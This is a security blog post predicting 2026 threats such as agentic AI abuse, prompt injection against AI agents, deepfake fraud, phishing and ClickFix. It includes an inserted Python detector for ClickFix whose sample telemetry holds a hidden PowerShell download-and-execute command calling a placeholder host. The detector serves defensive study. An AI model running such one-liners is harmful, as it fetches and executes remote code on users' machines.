From Vibe Hacking to Agentic Threats: The Truth About AI Malware
As 2025 draws to an end, we are taking the opportunity to analyze the threat trends we anticipate for the year ahead. With agentic AI maturing, there are naturally interesting new AI attacks on the horizon, but classic attacks such as account takeovers remain highly relevant too. The AI future is not "slowly arriving" in 2026 — it is here, and it is taking over.
Useful production AI implementations are still far from everywhere, but they are rapidly moving from simple chat assistants to full autonomy. These AI agents can reason, plan, and orchestrate complex, multi-step tasks with minimal human oversight. We believe that many organizations will sacrifice accuracy and — unfortunately — security for speed.
With each agent and tool potentially requiring its own digital identity, the number of such entities will explode, leaving organizations with the challenge of properly authenticating, monitoring, and restricting them. As these agents run in the background, acting independently across enterprise environments to access data, they generate a new attack surface. Attackers will happily abuse this to establish their own agentic insider, utilizing autonomous agents and unsecured AI MCP (Model Context Protocol) servers to exfiltrate data with just a few simple words.
This does not even account for Shadow AI, where well-meaning employees leak data by copy-pasting sensitive information — such as customer details — into unapproved Cloud AI apps and LLMs. To counter this, organizations will push for a Zero Trust AI environment in an attempt to tame AI's wild spread.
Prompt injection — whether direct or indirect — deserves its own focus. We fear this attack type will remain with us for a long time. The fundamental issue of distinguishing between code and data is notoriously difficult to solve, as acknowledged by OpenAI as well. Adding too many security checks limits a model's creativity and slows down the inference process. Furthermore, making detections work across agents by analyzing intent and expected outcomes is not foolproof either.
Compliance regulations in some regions increase this visibility gap, as organizations may not be permitted to log all messages on platforms like Slack or email, which is required to prove prompt injections occurred after an incident. Hence, for 2026, we predict prompt injections will be everywhere. Data poisoning attacks will occur as well, but not at the same scale or extent.
CEO fraud involving cloned voices and fake video calls is becoming easier for attackers to conduct. Scammers can now use voice systems to fully automate scam calls. Despite this, we believe such attacks will not be the norm in 2026, simply because there are still enough victims who fall for simpler scams via basic written emails. Attackers will stick to tried-and-tested methods as long as they remain profitable, while slowly building up their new techniques. Nevertheless, AI automation will boost romance scams, Know Your Customer (KYC) bypasses, fake invoice scams, and anything else relying on visual verification, leading to an erosion of trust across many fields. Getting access to voice-cloning apps is unfortunately very simple, as Consumer Reports has found.
AI-assisted attack automation frameworks will become the standard in 2026. They will assist attackers across the full kill chain, from initial breach and vulnerability discovery to exploitation at scale. Think of it as a fully automated penetration test running 24/7. This will not necessarily introduce completely new techniques, but rather use existing tools efficiently with little human oversight. Therefore, these attacks can be detected and blocked with known mitigations — if you are fast enough to react. A report from Anthropic in November highlighted how attackers can automate such attacks. Although the report lacks crucial details, companies such as XBOW and Horizon3.ai have demonstrated that attack automation is very much feasible.
Defenders must automate to defend at machine speed. We need to do our homework by implementing known best practices throughout the organization; otherwise, technical debt — such as unpatched systems or insecure remote access — will be compromised in near real-time. This will drive a push for proactive exposure management rather than reactive measures. Agentic AI acts as an accelerator, affecting the quantity of attacks more than the quality.
It is less about the capabilities of future AI models and more about the framework and the "glue" that binds them with various tools — that is the secret sauce. Cybercriminals are moving away from popular frontier models towards open-weight AI models, which allows them to host the infrastructure themselves, removing guardrails and monitoring. This increases the blind spot for the research community further, as they no longer have access to prompt reports.
As we enter AI vs. AI scenarios where every minute counts, companies have started to implement automated SOCs and automated AI triage of incidents to keep up. Consequently, we will likely see attackers abuse automated mitigations and SOAR platforms to disrupt organizations by generating false signals or injecting fake events into the AI workflows.
Contrary to popular belief, AI-powered malware will not be the norm. The benefits for attackers using fully AI-powered malware are currently limited; these threats are unreliable, unpredictable in outcome, and quite noisy. Attackers prefer attack automation (as discussed above) with less reliance on heavy malware payloads, preferring instead to tunnel access to their attack framework. This allows them to dynamically adapt to the environment without the disadvantages of traditional malware. A November report from Google highlighted that, so far, they have only seen basic malware abusing their Gemini models, and they have not come across any novel capabilities.
While basic off-the-shelf malware will be generated by AI in large quantities, the malware itself will not contain AI capabilities. There will likely only be a handful of cases of genuine AI-powered malware in 2026.
Attackers have automated phishing and spam email campaigns from start to finish with the help of AI, including the interactions required for BEC (Business Email Compromise), romance scams, or fake recruiter scams. They are also using zero-code platforms to generate phishing websites on the fly. This allows them to scale even further while using AI to personalize each email.
We have seen a further uptick in the malicious use of trusted infrastructure and SaaS applications, such as calendar invites or hijacked marketing platforms. This follows the classic Living-off-the-Land tactic, leveraging trusted sender domains to evade detection. ASCII QR codes, SVG smuggling, blob URLs, and similar techniques will persist until defenses catch up or attackers develop newer variations.
Stolen identities, sourced from phishing attacks and infostealers, will be used en masse for initial breaches. The trend is moving away from pure password stealing towards session and token theft to bypass MFA mitigations. AI is helping attackers analyze the enormous logs of stolen credentials quickly while they are still fresh. This challenge is compounded further by the increase in non-human identities, which often do not use MFA.
Browsers are slowly becoming the "new OS" of the enterprise, as many SaaS applications are part of daily operations. Additionally, increased network encryption, like Encrypted Client Hello (ECH), will force more analysis back to the endpoint.
In 2025, we saw a revival of "ClickFix" and other variations of manual scripting attacks. Here, the user is socially engineered to copy and execute code — for example, under the disguise of a CAPTCHA alternative. Since the action is user-initiated, many security tools struggle to detect it, though EDRs are catching up.
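Because the execution is user-initiated, the usable signal is the process lineage rather than the click itself: a script host launched from the interactive shell (explorer.exe, i.e. the Run dialog) with hidden-window, encoded or download-and-execute traits in its command line. The following is an added example, not code from the original post, implementing that heuristic over constructed Sysmon-style process-creation events; the field names, thresholds and sample command lines are assumptions.

```python
"""Heuristic detection of ClickFix-style copy-paste-and-run executions (added example)."""
import re
from dataclasses import dataclass

# Script hosts that a "paste this into Win+R" lure typically ends up launching.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# The Run dialog and desktop shortcuts are children of explorer.exe; managed script
# runs (installers, agents, scheduled tasks) normally have a different parent.
INTERACTIVE_PARENTS = {"explorer.exe"}
# Command-line traits that are rare for a human typing an interactive shell.
SUSPICIOUS = [
    (re.compile(r"-(?:enc|encodedcommand|e)\b", re.I), "encoded command"),
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|curl)\b", re.I),
     "remote download"),
    (re.compile(r"\biex\b|invoke-expression", re.I), "in-memory execution"),
    (re.compile(r"https?://", re.I), "URL in command line"),
]

@dataclass
class ProcessEvent:          # subset of Sysmon Event ID 1 fields (assumed shape)
    parent_image: str
    image: str
    command_line: str

def score_event(ev: ProcessEvent) -> list[str]:
    """Return the suspicious traits of one event, or [] if lineage does not match."""
    image = ev.image.rsplit("\\", 1)[-1].lower()
    parent = ev.parent_image.rsplit("\\", 1)[-1].lower()
    if image not in SCRIPT_HOSTS or parent not in INTERACTIVE_PARENTS:
        return []
    return [label for rx, label in SUSPICIOUS if rx.search(ev.command_line)]

def detect_clickfix(events, min_indicators: int = 2):
    """Flag events whose lineage matches and that show >= min_indicators traits."""
    hits = []
    for ev in events:
        reasons = score_event(ev)
        if len(reasons) >= min_indicators:
            hits.append((ev, reasons))
    return hits

# Constructed telemetry: two benign launches followed by two lure-style launches.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe"),                                   # user opened a shell
    ProcessEvent(r"C:\Windows\CCM\CcmExec.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"),  # managed run
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -w hidden -enc QUJD"),                    # placeholder base64, constructed
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell -NoP -W Hidden -c "iex (iwr https://example.invalid/verify)"'),
]
```

Tune `min_indicators` and the parent set to the environment; a help-desk team that legitimately pastes one-liners will need an allow-list on top of this lineage check.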
Various vendors are pushing dedicated agentic AI browsers, while others are equipping existing browsers like Chrome with extensions that make them agentic. With the introduction of shopping agents, there will be a surge of attackers trying to abuse them to purchase fake products or push other scams. After all, how do you conduct awareness training for your AI email agent, teaching it not to click on phishing links or fall for FormJacking? Models from major vendors have been found susceptible to phishing lures in the past, incorrectly prioritizing phishing emails due to the perceived urgency, highlighting the severity of this issue.
The increased use of vibe coding or AI-assisted Integrated Development Environments (IDEs) leads to more code being written by AI. This is a double-edged sword: while some beginner mistakes are avoided, AI may forget to check for edge cases if not explicitly asked, introducing new vulnerabilities.
These IDEs are also a prime target for attacks aiming to hijack AI models and embed persistent backdoors into automation workflows, as demonstrated by researchers. AppSec teams are starting to add AI apps to their threat modeling plans as they realize these applications require additional attention. Furthermore, AI-powered vulnerability researchers (such as XBOW) are finding hundreds of vulnerabilities. While very useful, this leads to bug bounty programs getting swamped with new issues that need fixing by the vendors.
Multi-cloud and hybrid setups with on-premise installations are booming again due to data sovereignty concerns in Europe. This shift often leads to exposed APIs and misconfigured environments. Attackers are increasingly interested in attacking cloud environments at all layers to access data. Attackers often strike from within the same IT stack, performing cloud-to-cloud attacks.
Exfiltration- and extortion-based ransomware will persist, bolstered by the previously mentioned attack vectors. More groups will collaborate and add AI for negotiation and other tasks, leading to faster and more selectively executed attacks.
Attacks against developer packages and pipelines will remain at an all-time high. Once successful, such attacks provide cybercriminals access to a vast number of targets at once.
The threat of "harvest now, decrypt later" is widely understood. Organizations are steadily moving their infrastructure to post-quantum algorithms with the help of providers such as Cloudflare.
The era of deferring security maintenance is over. As agentic AI accelerates attacks to machine speed, long-standing technical debt will transform from a manageable risk into an immediate liability. To survive 2026, organizations must pivot from reactive defense to proactive resilience — fixing the basics today to withstand the automation of tomorrow.
Candid Wüest